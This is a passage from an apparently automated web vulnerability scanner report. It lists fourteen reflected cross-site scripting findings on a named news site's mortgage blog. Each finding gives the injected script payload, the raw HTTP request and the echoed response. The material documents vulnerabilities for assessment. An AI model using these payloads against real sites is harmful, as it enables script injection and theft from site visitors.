Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/06/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23a00"><script>alert(1)</script>ebbc17fb5f6 was submitted in the REST URL parameter 2. This input was echoed as 23a00\"><script>alert(1)</script>ebbc17fb5f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/0623a00"><script>alert(1)</script>ebbc17fb5f6/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/0623a00\"><script>alert(1)</script>ebbc17fb5f6/feed/" />
...[SNIP]...

1.335. http://mortgage.ocregister.com/2010/06/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/06/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 528df"><script>alert(1)</script>67a958dbc2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 528df\"><script>alert(1)</script>67a958dbc2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/06/?528df"><script>alert(1)</script>67a958dbc2c=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 103917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 June - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/06/?528df\"><script>alert(1)</script>67a958dbc2c=1feed/" />
...[SNIP]...

1.336. http://mortgage.ocregister.com/2010/07/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/07/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3740"><script>alert(1)</script>9aa5f5044ac was submitted in the REST URL parameter 1. This input was echoed as e3740\"><script>alert(1)</script>9aa5f5044ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010e3740"><script>alert(1)</script>9aa5f5044ac/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010e3740\"><script>alert(1)</script>9aa5f5044ac/07/feed/" />
...[SNIP]...

1.337. http://mortgage.ocregister.com/2010/07/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/07/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 737f7"><script>alert(1)</script>3e0b1b344d0 was submitted in the REST URL parameter 2. This input was echoed as 737f7\"><script>alert(1)</script>3e0b1b344d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/07737f7"><script>alert(1)</script>3e0b1b344d0/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/07737f7\"><script>alert(1)</script>3e0b1b344d0/feed/" />
...[SNIP]...

1.338. http://mortgage.ocregister.com/2010/07/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/07/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0b75"><script>alert(1)</script>5819d4315a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c0b75\"><script>alert(1)</script>5819d4315a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/07/?c0b75"><script>alert(1)</script>5819d4315a4=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 July - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/07/?c0b75\"><script>alert(1)</script>5819d4315a4=1feed/" />
...[SNIP]...

1.339. http://mortgage.ocregister.com/2010/08/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/08/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4246e"><script>alert(1)</script>71ad8bebe0b was submitted in the REST URL parameter 1. This input was echoed as 4246e\"><script>alert(1)</script>71ad8bebe0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20104246e"><script>alert(1)</script>71ad8bebe0b/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20104246e\"><script>alert(1)</script>71ad8bebe0b/08/feed/" />
...[SNIP]...

1.340. http://mortgage.ocregister.com/2010/08/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/08/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e9c"><script>alert(1)</script>121b788efa9 was submitted in the REST URL parameter 2. This input was echoed as e3e9c\"><script>alert(1)</script>121b788efa9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/08e3e9c"><script>alert(1)</script>121b788efa9/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/08e3e9c\"><script>alert(1)</script>121b788efa9/feed/" />
...[SNIP]...

1.341. http://mortgage.ocregister.com/2010/08/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/08/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed771"><script>alert(1)</script>1f1c98d951d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed771\"><script>alert(1)</script>1f1c98d951d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/08/?ed771"><script>alert(1)</script>1f1c98d951d=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 104455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 August - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/08/?ed771\"><script>alert(1)</script>1f1c98d951d=1feed/" />
...[SNIP]...

1.342. http://mortgage.ocregister.com/2010/09/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/09/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3029"><script>alert(1)</script>458883cf61d was submitted in the REST URL parameter 1. This input was echoed as b3029\"><script>alert(1)</script>458883cf61d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010b3029"><script>alert(1)</script>458883cf61d/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010b3029\"><script>alert(1)</script>458883cf61d/09/feed/" />
...[SNIP]...

1.343. http://mortgage.ocregister.com/2010/09/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/09/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84704"><script>alert(1)</script>12779ca8568 was submitted in the REST URL parameter 2. This input was echoed as 84704\"><script>alert(1)</script>12779ca8568 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/0984704"><script>alert(1)</script>12779ca8568/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/0984704\"><script>alert(1)</script>12779ca8568/feed/" />
...[SNIP]...

1.344. http://mortgage.ocregister.com/2010/09/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/09/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3512f"><script>alert(1)</script>0f889d943e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3512f\"><script>alert(1)</script>0f889d943e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/09/?3512f"><script>alert(1)</script>0f889d943e3=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 September - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/09/?3512f\"><script>alert(1)</script>0f889d943e3=1feed/" />
...[SNIP]...

1.345. http://mortgage.ocregister.com/2010/10/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/10/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7345b"><script>alert(1)</script>a5ceac7571b was submitted in the REST URL parameter 1. This input was echoed as 7345b\"><script>alert(1)</script>a5ceac7571b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20107345b"><script>alert(1)</script>a5ceac7571b/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:15 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20107345b\"><script>alert(1)</script>a5ceac7571b/10/feed/" />
...[SNIP]...

1.346. http://mortgage.ocregister.com/2010/10/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/10/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbcf4"><script>alert(1)</script>defd5ce1a69 was submitted in the REST URL parameter 2. This input was echoed as fbcf4\"><script>alert(1)</script>defd5ce1a69 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/10fbcf4"><script>alert(1)</script>defd5ce1a69/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/10fbcf4\"><script>alert(1)</script>defd5ce1a69/feed/" />
...[SNIP]...

1.347. http://mortgage.ocregister.com/2010/10/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/10/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69fc7"><script>alert(1)</script>e6e9254e02c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69fc7\"><script>alert(1)</script>e6e9254e02c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/10/?69fc7"><script>alert(1)</script>e6e9254e02c=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 October - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/10/?69fc7\"><script>alert(1)</script>e6e9254e02c=1feed/" />
...[SNIP]...

1.348. http://mortgage.ocregister.com/2010/11/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/11/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb8f1"><script>alert(1)</script>d0a62076da8 was submitted in the REST URL parameter 1. This input was echoed as cb8f1\"><script>alert(1)</script>d0a62076da8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010cb8f1"><script>alert(1)</script>d0a62076da8/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
